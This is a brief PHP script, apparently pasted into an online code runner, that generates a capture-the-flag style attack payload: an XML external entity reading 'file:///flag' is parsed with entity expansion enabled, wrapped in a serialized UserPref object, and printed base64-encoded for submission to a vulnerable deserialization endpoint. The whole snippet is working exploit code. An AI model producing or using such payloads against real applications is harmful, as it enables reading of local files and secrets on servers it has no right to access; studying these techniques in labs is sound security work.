<?php class UserPref { public $theme; public $lang; } $xml = '<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ENTITY xxe SYSTEM "file:///flag"> ]> <root>&xxe;</root>'; $obj = new UserPref(); $obj->theme = new SimpleXMLElement($xml, LIBXML_NOENT); $obj->lang = "zh"; echo base64_encode(serialize($obj)); ?>
You have javascript disabled. You will not be able to edit any code.